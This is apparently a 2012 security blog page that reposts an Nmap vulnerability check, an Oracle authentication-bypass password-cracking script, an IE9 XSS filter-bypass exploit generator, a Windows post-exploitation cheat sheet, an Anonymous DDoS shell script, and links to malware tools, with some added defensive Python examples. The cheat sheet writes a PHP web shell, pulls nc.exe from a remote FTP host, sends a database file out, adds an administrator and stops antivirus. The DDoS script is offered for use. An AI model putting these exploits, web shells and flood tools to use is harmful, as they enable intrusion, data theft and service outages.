Oct 19, 2012

Check the DoS Vulnerability of the Apache Web Server with Multiple Overlapping/Simple Ranges of a Page [CVE-2011-3192] with an Nmap NSE Script

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local vulns = require "vulns"

description = [[
Detects a denial of service vulnerability in the way the Apache web server
handles requests for multiple overlapping/simple ranges of a page.

References:
* http://seclists.org/fulldisclosure/2011/Aug/175
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
* http://nessus.org/plugins/index.php?view=single&id=55976
]]

---
-- @usage
-- nmap --script http-vuln-cve2011-3192.nse [--script-args http-vuln-cve2011-3192.hostname=nmap.scanme.org] -pT:80,443 <host>
--
-- @output
-- Host script results:
-- | http-vuln-cve2011-3192: 
-- |   VULNERABLE:
-- |   Apache byterange filter DoS
-- |     State: VULNERABLE
-- |     IDs:  CVE:CVE-2011-3192  OSVDB:74721
-- |     Description:
-- |       The Apache web server is vulnerable to a denial of service attack when numerous
-- |       overlapping byte ranges are requested.
-- |     Disclosure date: 2011-08-19
-- |     References:
-- |       http://seclists.org/fulldisclosure/2011/Aug/175
-- |       http://nessus.org/plugins/index.php?view=single&id=55976
-- |       http://osvdb.org/74721
-- |_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
--
-- @args http-vuln-cve2011-3192.hostname  Define the host name to be used in the HEAD request sent to the server
-- @args http-vuln-cve2011-3192.path  Define the request path

-- changelog
-- 2011-08-29 Duarte Silva <duarte.silva@serializing.me>
--   - Removed the "Accept-Encoding" HTTP header
--   - Removed response header printing
--   * Changes based on Henri Doreau and David Fifield suggestions
-- 2011-08-20 Duarte Silva <duarte.silva@serializing.me>
--   * First version ;)
-- 2011-11-07 Henri Doreau
--   * Use the vulns library to report results
-----------------------------------------------------------------------

author = "Duarte Silva <duarte.silva@serializing.me>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln", "safe"}


portrule =  shortport.http

action = function(host, port)
    local vuln = {
        title = 'Apache byterange filter DoS',
        state = vulns.STATE.NOT_VULN, -- default
        IDS = {CVE = 'CVE-2011-3192', OSVDB = '74721'},
        description = [[
The Apache web server is vulnerable to a denial of service attack when numerous
overlapping byte ranges are requested.]],
        references = {
            'http://seclists.org/fulldisclosure/2011/Aug/175',
            'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192',
            'http://nessus.org/plugins/index.php?view=single&id=55976',
        },
        dates = {
            disclosure = {year = '2011', month = '08', day = '19'},
        },
      }
    local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
    local hostname, path = stdnse.get_script_args('http-vuln-cve2011-3192.hostname',
        'http-vuln-cve2011-3192.path')

    if not path then
        path = '/'

        stdnse.print_debug(1, "Setting the request path to '/' since 'http-vuln-cve2011-3192.path' argument is missing.")
    end

    -- This first request will try to get a code 206 reply from the server by
    -- sending the innocuous header "Range: bytes=0-100" in order to detect
    -- whether this functionality is available or not.
    local request_opts = {
        header = {
            Range = "bytes=0-100",
            Connection = "close"
        },
        bypass_cache = true
    }

    if hostname then
        request_opts.header.Host = hostname
    end

    local response = http.head(host, port, path, request_opts)

    if not response.status then
        stdnse.print_debug(1, "%s: Functionality check HEAD request failed for %s (with path '%s').",
            SCRIPT_NAME, hostname or host.ip, path)
    elseif response.status == 206 then
        -- The server handles range requests. Now try to request 11 ranges (one more
        -- than allowed).
        -- Vulnerable servers will reply with another code 206 response. Patched
        -- ones will return a code 200.
        request_opts.header.Range = "bytes=1-0,0-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"

        response = http.head(host, port, path, request_opts)

        if not response.status then
            stdnse.print_debug(1, "%s: Invalid response from server to the vulnerability check",
                SCRIPT_NAME)
        elseif response.status == 206 then
            vuln.state = vulns.STATE.VULN
        else
            stdnse.print_debug(1, "%s: Server isn't vulnerable (%i status code)",
                SCRIPT_NAME, response.status)
        end
    else
        stdnse.print_debug(1, "%s: Server ignores the range header (%i status code)",
            SCRIPT_NAME, response.status)
    end
    return vuln_report:make_output(vuln)
end
 
Source: https://svn.nmap.org/nmap/scripts/http-vuln-cve2011-3192.nse 
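The script above only tells patched hosts from vulnerable ones by the status code they return. As an added example (not part of the Nmap script, the Apache project or the original post), the Python below shows the check a patched server, or a reverse proxy placed in front of an unpatched one, applies to the Range header: count the ranges, refuse overlapping ones, and fall back to a plain 200 (whole entity, Range ignored) when the header looks abusive, which is exactly what the NSE script interprets as "not vulnerable". The threshold of five ranges is an assumption taken from the interim mod_rewrite workaround in the Apache advisory; the header values fed to it are the two the script sends plus one constructed overlapping set.

```python
"""Server-side guard against CVE-2011-3192-style Range abuse (added example)."""
import re

# Assumed threshold: the advisory's interim mod_rewrite rule allowed at most
# five ranges per request before rejecting it.
MAX_RANGES = 5

_RANGE_SPEC = re.compile(r"^(\d*)-(\d*)$")


def parse_byte_ranges(header):
    """Parse 'bytes=a-b,c-d,-e' into (start, end) tuples; None marks an open end.

    Returns None when the header is not a syntactically valid byte-range set.
    """
    if not header.startswith("bytes="):
        return None
    ranges = []
    for spec in header[len("bytes="):].split(","):
        m = _RANGE_SPEC.match(spec.strip())
        if not m or m.group(1) == m.group(2) == "":
            return None
        start = int(m.group(1)) if m.group(1) else None
        end = int(m.group(2)) if m.group(2) else None
        ranges.append((start, end))
    return ranges


def ranges_overlap(ranges):
    """True if any two fully specified, satisfiable ranges overlap."""
    spans = sorted(
        (s, e) for s, e in ranges
        if s is not None and e is not None and s <= e
    )
    return any(s2 <= e1 for (_, e1), (s2, _) in zip(spans, spans[1:]))


def range_header_is_abusive(header, max_ranges=MAX_RANGES):
    """True when the server should ignore the header rather than honour it."""
    ranges = parse_byte_ranges(header)
    if ranges is None:
        return False  # malformed header: not this check's job (200 or 416 elsewhere)
    return len(ranges) > max_ranges or ranges_overlap(ranges)


def status_for_range(header, max_ranges=MAX_RANGES):
    """Status a hardened server answers with: 206 for a sane range set, 200 (whole
    entity, Range ignored) for a missing, malformed or abusive one."""
    if header is None or parse_byte_ranges(header) is None:
        return 200
    if range_header_is_abusive(header, max_ranges):
        return 200
    return 206


if __name__ == "__main__":
    # The two headers the Nmap script sends, plus a constructed overlapping set.
    probe = "bytes=1-0,0-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"
    for h in ("bytes=0-100", probe, "bytes=0-10,5-15"):
        print("%-60s -> %d" % (h, status_for_range(h)))
```

The probe header the script uses contains twelve ranges, the first of them unsatisfiable (1-0); the count alone is enough to make a hardened server drop to 200, which is the response the script treats as patched.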


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Oracle Database Authentication Protocol Security Bypass - Packetstorm

Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol.

An attacker can exploit this issue to bypass the authentication process and gain unauthorized access to the database.

This vulnerability affects Oracle Database 11g Release 1 and 11g Release 2.


#-*-coding:utf8 -*-
# Python 2 / PyCrypto

import hashlib
from Crypto.Cipher import AES

def decrypt(session, salt, password):
    pass_hash = hashlib.sha1(password + salt)

    # Pad the 20-byte SHA-1 digest with four zero bytes to get a 24-byte AES-192 key
    key = pass_hash.digest() + '\x00\x00\x00\x00'
    # CBC with an all-zero IV (PyCrypto's default when no IV is given; made explicit here)
    decryptor = AES.new(key, AES.MODE_CBC, '\x00' * 16)
    plain = decryptor.decrypt(session)
    return plain

# Encrypted session key sent by the server, 48 bytes (96 hex characters)
session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'

# Salt, 10 bytes
salt_hex = 'A7193E546377EC56639E'

passwords = ['test', 'password', 'oracle', 'demo']

for password in passwords:
    session_id = decrypt(session_hex.decode('hex'), salt_hex.decode('hex'), password)
    print 'Decrypted session_id for password "%s" is %s' % (password, session_id.encode('hex'))
    # A correct key leaves 8 bytes of 0x08 padding after the 40-byte session key
    if session_id[40:] == '\x08\x08\x08\x08\x08\x08\x08\x08':
        print 'PASSWORD IS "%s"' % password
        break





Source: http://packetstorm.igor.onlinedirect.bg/1210-exploits/oracledb-bypass.txt


Oct 18, 2012

Internet Explorer 9 XSS Filter Bypass

#################################################
Internet Explorer 9 XSS Filter Bypass
#################################################
Discovered by: Jean Pascal Pereira <pereira@secbiz.de>
Vendor information:
"Internet Explorer (formerly Microsoft Internet Explorer and Windows Internet Explorer, commonly abbreviated IE or MSIE) is a series of graphical web browsers developed by Microsoft and included as part of the Microsoft Windows line of operating systems, starting in 1995. It was first released as part of the add-on package Plus! for Windows 95 that year. Later versions were available as free downloads, or in service packs, and included in the OEM service releases of Windows 95 and later versions of Windows."
Vendor URI: http://www.microsoft.com
#################################################
Issue: Cross Site Scripting Filter Bypass
-------------------------------------
Description:
Internet Explorer 9 offers a feature that eliminates suspicious patterns passed to a website in a parameter.
For example, we have the following script:
-------------------------------------
<?php
echo $_GET['a'];
?>
-------------------------------------
Let's call it "blah.php". Now we access blah.php using Internet Explorer 9 and try to execute a malicious string:
http://localhost/ieb/blah.php?a=<script>alert(1)</script>
After this, we receive the message "Internet Explorer has modified this page to help prevent cross-site scripting".
The JavaScript won't be executed.
-------------------------------------
Proof Of Concept:
This trick may be known to some of you. Internet Explorer allows stripping tags by inserting null bytes.
For example, the following string will be executed:
3C 73 00 63 72 69 70 74 3E 61 6C 65 72 74 28 31 29 3C 2F 73 00 63 72 69 70 74 3E
Which is actually "<s[NULL]cript>alert(1)</s[NULL]cript>".
However, we won't be able to insert the null bytes directly in the URI. The following example won't work:
http://localhost/ieb/blah.php?a=<script>alert(1)</script>
But there is still another possibility. Grab a hex editor and create a file looking like the example given below:
<a href='http://localhost/ieb/blah.php?a=<s[NULL]cript>alert(1)</s[NULL]cript>'>Clickme</a>
If you open the file and click the provided link, the script will be executed.
-------------------------------------
Exploit (for the lazy folks):
-------------------------------------
#!/usr/bin/perl
use strict;
use warnings;
# Internet Explorer 9 XSS Filter Bypass Generator
# Credit: Jean Pascal Pereira <pereira[at]secbiz.de>
# http://0xffe4.org
my $target  = shift || die("No target defined");
my $payload = shift || die("No payload defined");
my $lnk_txt = shift || "Click me :)";
open(OUT, ">:raw", "out.html");
print OUT "\x3C\x61\x20\x68\x72\x65\x66\x3D\x27";
print OUT $target;
print OUT "\x3C\x73\x00\x63\x72\x69\x70\x74\x3E";
print OUT $payload;
print OUT "\x3C\x2F\x73\x00\x63\x72\x69\x70\x74\x3E\x27\x3E";
print OUT $lnk_txt;
print OUT "\x3C\x2F\x61\x3E";
close(OUT);
-------------------------------------
Example usage is:
iefilter.pl http://www.example.com?var= alert(1)
-------------------------------------
Note:
Exploitation via <a href="ja[NULL]vascript:... links is also possible.
-------------------------------------
Solution:
Currently, no solution is available for this issue.
-------------------------------------
#################################################
< http://0xffe4.org >


# 1337day.com [2012-10-18]


Source: http://1337day.com/exploit/19579
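The advisory's lesson for the server side is that a signature such as "<script" never sees "<s[NULL]cript>" while the browser does, so a reflecting page cannot rely on the client-side filter. As an added example (not from the advisory, its author or the blog), the Python below decodes the advisory's own byte sequence, shows that a naive pattern match misses it, and shows the two defences a page like blah.php should apply: normalise away control characters before matching, and, more importantly, HTML-encode reflected input so that no tag survives at all. The query-string helper uses the standard percent-decoding, so a %00 in the URL arrives as a real NUL, which is the case the file-based link in the advisory produces.

```python
"""Reflected-parameter hardening against NUL-split tags (added example)."""
import html
import re
from urllib.parse import parse_qs

# The advisory's byte sequence, decoded (constructed from the hex on the page).
PAGE_PAYLOAD = bytes.fromhex(
    "3C 73 00 63 72 69 70 74 3E 61 6C 65 72 74 28 31 29 3C 2F 73 00 63 72 69 70 74 3E"
).decode("ascii")

_NAIVE_SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def naive_filter_flags(value):
    """Literal signature match of the kind the NUL-split payload evades."""
    return _NAIVE_SCRIPT_RE.search(value) is not None


def strip_control_chars(value):
    """Drop NUL and the other C0 controls (keeping tab, LF and CR) so the filter
    compares against what a lenient HTML parser would reconstruct."""
    return "".join(ch for ch in value if ch >= " " or ch in "\t\n\r")


def hardened_filter_flags(value):
    """Same signature, applied after control-character normalisation."""
    return naive_filter_flags(strip_control_chars(value))


def render_param(value):
    """Safe replacement for `echo $_GET['a']`: strip controls, then HTML-encode."""
    return html.escape(strip_control_chars(value), quote=True)


def flag_query_params(query_string):
    """Map each parameter of a raw query string to (naive_hit, hardened_hit).

    parse_qs percent-decodes, so a %00 in the URL becomes a real NUL byte.
    """
    out = {}
    for name, values in parse_qs(query_string, keep_blank_values=True).items():
        out[name] = (
            any(naive_filter_flags(v) for v in values),
            any(hardened_filter_flags(v) for v in values),
        )
    return out


if __name__ == "__main__":
    print("payload  :", repr(PAGE_PAYLOAD))
    print("naive    :", naive_filter_flags(PAGE_PAYLOAD))
    print("hardened :", hardened_filter_flags(PAGE_PAYLOAD))
    print("rendered :", render_param(PAGE_PAYLOAD))
    print(flag_query_params("a=%3Cs%00cript%3Ealert(1)%3C/s%00cript%3E"))
```

Output encoding is the fix that actually closes the issue: once "<" is rendered as "&lt;", it no longer matters which characters the browser is willing to ignore inside a tag name, and the signature check becomes defence in depth rather than the only barrier.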


Post Exploit By Stormsecurity

View your current user: whoami
View information about the current user: net user myuser (for a local user)
net user myuser /domain (for a domain user)
View the local groups: net localgroup
View the local administrators: net localgroup Administrators
Add a new user: net user myuser mypass /add
Add a user to the local Administrators group: net localgroup Administrators myuser /add
View the domain name of the current machine: net config workstation
net config server
View the name of the domain controller: reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History" /v DCName
View the list of domain admins: net group "Domain Admins" /domain
View the list of started services (search for antivirus): net start
sc query
Stop a service: net stop "Symantec Endpoint Protection"
View the list of running processes and their owners: tasklist /v
Kill a process by its name: taskkill /F /IM "cmd.exe"
Abort a shutdown/restart countdown: shutdown /a
Create a PHP backdoor/shell: echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\s.php
Download an executable from a remote FTP server: echo open 10.1.2.3> C:\script.txt
echo user myftpuser>> C:\script.txt
echo pass myftppass>> C:\script.txt
echo get nc.exe>> C:\script.txt
echo bye>> C:\script.txt
ftp -s:script.txt
Upload a file to a remote FTP server: echo open 10.1.2.3> C:\script.txt
echo user myftpuser>> C:\script.txt
echo pass myftppass>> C:\script.txt
echo put E:\backups\database.dbf>> C:\script.txt
echo bye>> C:\script.txt
ftp -s:script.txt
View established connections of the current machine: netstat -a -n -p tcp | find "ESTAB"
View open ports of the current machine: netstat -a -n -p tcp | find "LISTEN"
netstat -a -n -p udp
View network configuration: netsh interface ip show addresses
netsh interface ip show route
netsh interface ip show neighbors
View current network shares: net share
Mount a remote share with the rights of the current user: net use K: \\10.1.2.3\C$
dir K:
Enable Remote Desktop: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


Source: http://stormsecurity.wordpress.com/2012/06/05/manual-pentesting-cheatsheet-windows/
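Every command on this cheat sheet leaves a process-creation record, and most of the state-changing ones (account creation, group membership, service stops, RDP enablement, scripted FTP, files dropped in a web root, admin-share mounts) are exactly what an analyst should be alerting on. As an added example (not from the stormsecurity post or the blog), the Python below runs a small rule set over a constructed list of command lines, the shape of the CommandLine field in a Sysmon event 1 or Security event 4688 record, and reports which cheat-sheet action each one corresponds to. The security-product names in the "service stopped" rule are an illustrative list, not an inventory; the sample records are constructed from the commands above plus two benign ones.

```python
"""Detection rules for the post-exploitation commands above (added example)."""
import re

# Constructed sample: the cheat sheet's command lines plus two benign ones.
SAMPLE_EVENTS = [
    "whoami",
    "net user myuser /domain",
    "net user myuser mypass /add",
    "net localgroup Administrators myuser /add",
    'net group "Domain Admins" /domain',
    'net stop "Symantec Endpoint Protection"',
    'taskkill /F /IM "cmd.exe"',
    "echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\\inetpub\\wwwroot\\s.php",
    "ftp -s:script.txt",
    r"net use K: \\10.1.2.3\C$",
    r'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
]

_NET = r"\bnet1?(?:\.exe)?\s+"  # net.exe or net1.exe, with or without the extension

RULES = [
    ("local account created",
     re.compile(_NET + r"user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("user added to local Administrators",
     re.compile(_NET + r"localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("domain admins enumerated",
     re.compile(_NET + r"group\s+\"domain admins\"\s+/domain\b", re.I)),
    ("security service stopped",  # illustrative product list, not an inventory
     re.compile(r"\b(?:net1?|sc)(?:\.exe)?\s+stop\s+\"?(?:symantec|mcafee|sophos|windefend|msmpeng)", re.I)),
    ("script written into web root",
     re.compile(r"\becho\b.*>\s*\S*wwwroot\\\S+\.php\b", re.I)),
    ("scripted ftp transfer",
     re.compile(r"\bftp(?:\.exe)?\b.*\s-s:", re.I)),
    ("admin share mounted",
     re.compile(_NET + r"use\s+\S+\s+\\\\[^\\\s]+\\[a-z]\$", re.I)),
    ("RDP enabled via registry",
     re.compile(r"\breg(?:\.exe)?\s+add\b.*terminal server.*fDenyTSConnections.*/d\s+0\b", re.I)),
]


def match_rules(command_line):
    """Names of every rule that fires on one command line, in rule order."""
    return [name for name, rx in RULES if rx.search(command_line)]


def triage(events):
    """(index, command_line, [rule names]) for each event that matched anything."""
    hits = []
    for i, cmd in enumerate(events):
        names = match_rules(cmd)
        if names:
            hits.append((i, cmd, names))
    return hits


if __name__ == "__main__":
    for i, cmd, names in triage(SAMPLE_EVENTS):
        print("event %2d  %-45s  %s" % (i, cmd[:45], ", ".join(names)))
```

Pure enumeration (whoami, net user without /add, tasklist) is deliberately left unmatched here: on its own it is too common to alert on, and it is the state changes that follow it which the rules key on.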



DDoS Making Requests Through Google Servers, By Anonymous

An Anonymous DDoS tool (shell script) pasted on pastebin.com; try it at your own risk.

#!/bin/bash


#  Follow @AnonymousOwn3r  #
# https://twitter.com/AnonymousOwn3r #


function start {
    echo "[*] Sending `echo $2` Requests..."
    
    for a in `seq $2`
    do
        id=$((RANDOM%3999999+3000000))
        nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
        nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
    done

    echo "[*] Still attacking `echo $urlclear`"
    echo "[*] Sleeping for 10 Seconds"
    sleep 10
    start url $2 urlclear
}

echo ''
echo '             88888888ba,    88888888ba,                  ad88888ba  ' 
echo '    aa      88      `"8b   88      `"8b                d8"     "8b  '
echo '    88      88        `8b  88        `8b               Y8,          '
echo 'aaaa88aaaa  88         88  88         88   ,adPPYba,   `Y8aaaaa,    '
echo '""""88""""  88         88  88         88  a8"     "8a    `"""""8b,  '
echo '    88      88         8P  88         8P  8b       d8          `8b  '
echo '    ""      88      .a8P   88      .a8P   "8a,   ,a8"  Y8a     a8P  '
echo '            88888888Y""    88888888Y""     `"YbbdP""    "Y88888P"'
echo ''

if [ "$#" -lt 2 ]; then
    echo "Usage: $0 <big file> <Requests>"
    echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
    echo ""

    exit 0
fi

case $2 in
    *[!0-9]* )  echo "$2 is not numeric" && exit 1;;
esac

echo "Attack -->" $1
match1=/
repl1=%2F
match2=:
repl2=%3A
url=$1
urlclear=$1

url=${url//$match1/$repl1}
url=${url//$match2/$repl2}

echo ""
echo "[*] Loop started! CTRL+C to stop"
echo ""

start url $2 urlclear


Source: http://pastebin.com/92ZJ0CvD




Oct 17, 2012

Fingerprint a Website's Web Applications with WhatWeb

Next generation web scanner. WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1000 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.



Source: http://whatweb.net/

 


Evilgrade Proxy [Ruby] by bigmac

This tool is used for man-in-the-middle attacks with Metasploit plus a proxy that intercepts EXE file downloads and swaps the file for malware generated by Metasploit. It was created by bigmac and posted on pastebin.

Source:  http://pastebin.com/n7AHi5Ny

Download: http://dl.dropbox.com/u/2330423/evilgrade_ruby.rb


Oct 15, 2012

Metasploit stager: reverse_https with basic authentication against proxy

If you want all the details and an example, please go to the Source.

Unlike NTLM, the username and password used during a basic authentication remain in the scope of the process (example: in your browser, after a successful authentication against the proxy server). This is the reason why reverse_http(s) doesn't know anything about this password. Instead, the reverse_http(s) stager uses the WinInet API to let Windows manage how to reach the Internet.
Back to our basic authentication mechanism: this customized version of reverse_https lets you embed a valid username and password inside the payload, to allow proper basic authentication against the proxy server. The proxy settings (IP, port, proxy.pac, …) are automatically managed by WinInet.



Download Link: http://funoverip.net/wp-content/uploads/2012/10/reverse_https_proxy_basicauth.tar.gz

Source:  http://funoverip.net/2012/10/metasploit-stager-reverse_https-basic-authentication-against-proxy/


adbdSecure - Malicious Toolkit Thwarted

Malicious Toolkit Thwarted by adbdSecure

A malicious toolkit by Kos recently appeared in the wild, called P2P ADB, which provides tools for attacking a device if ADB debugging is left enabled on the target device. Here is a breakdown of what this toolkit enables by taking advantage of USB debug mode, root, and some crafty hacks:
  • bypassing lock screens,
  • making system changes and even "backing up" Android profiles, all from one phone to another,
  • performing an auth token cloning attack, enabling an attacker to gain access to a victim's Google account, change the password, or even set up a one-time password for themselves if two-factor authentication is enabled.
XDA Elite Recognized Developer Stericson immediately recognized the danger and created adbdSecure. His application helps to guard your device from malicious attacks that seek to use adbd, but only does so when you have enabled a password, PIN, or pattern lock for your lock screen. adbdSecure turns adbd on when the phone is unlocked and turns it back off when the screen goes off, thus preventing any sort of intrusion on your device. Add Tasker into the equation, and you have a pretty versatile application for all sorts of protection.
And in the true nature of XDA, Stericson has open-sourced the application so that you can take what he has done and improve it, as well as contribute more to the community. You can find the source on GitHub, and download the application for your device on Google Play. And once again, the only way to protect your device from this attack is to take the initiative and add lock screen protection.


Source: http://www.xda-developers.com/android/malicious-toolkit-thwarted-by-adbdsecure/


Server Shield v1.0.4 - Hardening Linux Server

Server Shield v1.0.4
Server Shield is a lightweight method of protecting and hardening your Linux server. It is easy to install, hard to mess up, and makes your server instantly and effortlessly resilient to many basic and advanced attacks.
IP address and ethernet interface are automatically detected. Support for servers with multiple IP addresses will be added soon.
Features
  • Firewall Hardening
  • TCP Hardening
  • Data Leakage Protection
  • ICMP/Ping Flood Protection
  • Rootkit Protection
  • DoS Protection
  • Spoof Protection
  • Bogus TCP Protection
  • SYN Flood Protection
Source: https://github.com/Brian-Holt/server-shield

